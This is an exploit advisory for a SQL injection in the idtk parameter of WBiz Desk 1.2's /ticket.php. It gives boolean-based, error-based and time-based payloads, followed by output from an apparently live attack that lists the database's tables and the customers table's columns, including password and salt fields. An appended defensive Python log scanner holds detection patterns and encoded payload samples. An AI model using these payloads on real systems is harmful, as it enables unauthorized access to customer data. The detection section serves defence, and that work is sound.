[ Vulnerability ]

Author    : CraCkEr
Website   : https://www.codester.com/items/5641/
Vendor    : WeBiz Digital
Software  : WBiz Desk 1.2
Vuln Type : SQL Injection
Impact    : Database Access

Release Notes:
═════════════

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.

Greets:
    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
    CryptoJob (Twitter) twitter.com/0x0CryptoJob

© CraCkEr 2023

Path: /ticket.php

http://website/ticket.php?tk=1&idtk=[SQLi]&action=close

GET parameter 'idtk' is vulnerable to SQL Injection

---
Parameter: idtk (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: tk=1&idtk=1' RLIKE (SELECT (CASE WHEN (8547=8547) THEN 1 ELSE 0x28 END))-- KUTf&action=close

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: tk=1&idtk=1' OR (SELECT 3964 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT (ELT(3964=3964,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- kned&action=close

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: tk=1&idtk=1' AND (SELECT 9716 FROM (SELECT(SLEEP(5)))OGEN)-- uSzC&action=close
---

[+] Starting the Attack

fetching current database
current database: 'wbizdesk_*****_com_br'

fetching tables
[12 tables]
+----------------+
| accounts       |
| category       |
| chat           |
| config         |
| customers      |
| departments    |
| email_template |
| log_tb         |
| messages       |
| tickets        |
| tutorial       |
| users          |
+----------------+

fetching columns for table 'customers'
[19 columns]
+--------------+-------------------+
| Column       | Type              |
+--------------+-------------------+
| name         | varchar(160)      |
| number       | varchar(11)       |
| status       | enum('S','B','N') |
| address      | varchar(255)      |
| city         | varchar(160)      |
| company      | varchar(160)      |
| country      | varchar(60)       |
| cpf_cnpj     | varchar(60)       |
| email        | varchar(255)      |
| id           | int(11)           |
| ip           | varchar(90)       |
| neighborhood | varchar(160)      |
| obs          | text              |
| os           | varchar(160)      |
| pass         | varchar(160)      |
| phrase       | varchar(160)      |
| salt         | varchar(255)      |
| state        | varchar(160)      |
| zipcode      | varchar(60)       |
+--------------+-------------------+

[-] Done
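
For defenders reviewing web server logs, the following added example (not part of the original advisory and not vendor code) flags requests to /ticket.php whose decoded idtk value matches one of the three payload families listed above. The log lines are constructed samples, and treating a legitimate idtk as a plain decimal ticket id is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Signatures for the three payload families listed in the advisory.
TECHNIQUES = [
    ("boolean-based blind", re.compile(r"\bRLIKE\b.*\bCASE\s+WHEN\b", re.I | re.S)),
    ("error-based", re.compile(r"\bFLOOR\s*\(\s*RAND\s*\(", re.I)),
    ("time-based blind", re.compile(r"\bSLEEP\s*\(", re.I)),
]
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify_idtk(value):
    """Name the technique a decoded idtk value matches, else flag non-digits."""
    for name, pattern in TECHNIQUES:
        if pattern.search(value):
            return name
    # Assumption: a legitimate idtk is a plain decimal ticket id.
    return None if re.fullmatch(r"[0-9]+", value) else "non-numeric"

def scan(log_lines, path="/ticket.php"):
    """Return (client, verdict, decoded idtk) for each suspicious request."""
    findings = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path != path:
            continue
        # parse_qs percent-decodes, so encoded payloads are matched in clear text.
        for value in parse_qs(url.query).get("idtk", []):
            verdict = classify_idtk(value)
            if verdict:
                findings.append((line.split()[0], verdict, value))
    return findings

# Constructed sample log (documentation addresses, combined log format).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2023:10:00:00 +0000] "GET /ticket.php?tk=1&idtk=42&action=close HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2023:10:00:05 +0000] "GET /ticket.php?tk=1&idtk=1%27%20AND%20(SELECT%209716%20FROM%20(SELECT(SLEEP(5)))OGEN)--%20uSzC&action=close HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2023:10:00:11 +0000] "GET /ticket.php?tk=1&idtk=1%27%20RLIKE%20(SELECT%20(CASE%20WHEN%20(8547=8547)%20THEN%201%20ELSE%200x28%20END))--%20KUTf&action=close HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2023:10:00:12 +0000] "GET /ticket.php?tk=1&idtk=1%27%20OR%20(SELECT%203964%20FROM(SELECT%20COUNT(*),CONCAT(0x71706b7171,(SELECT%20(ELT(3964=3964,1))),0x7178787171,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)--%20kned&action=close HTTP/1.1" 500 0',
    '198.51.100.7 - - [01/Jan/2023:10:00:13 +0000] "GET /ticket.php?tk=1&idtk=1%27&action=close HTTP/1.1" 500 0',
    '192.0.2.10 - - [01/Jan/2023:10:00:20 +0000] "GET /index.php?idtk=1%27 HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for client, verdict, value in scan(SAMPLE_LOG):
        print(f"{client}  {verdict:20}  {value}")
```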